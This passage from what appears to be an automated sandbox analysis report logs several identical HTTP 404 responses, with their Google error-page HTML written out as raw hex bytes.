6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 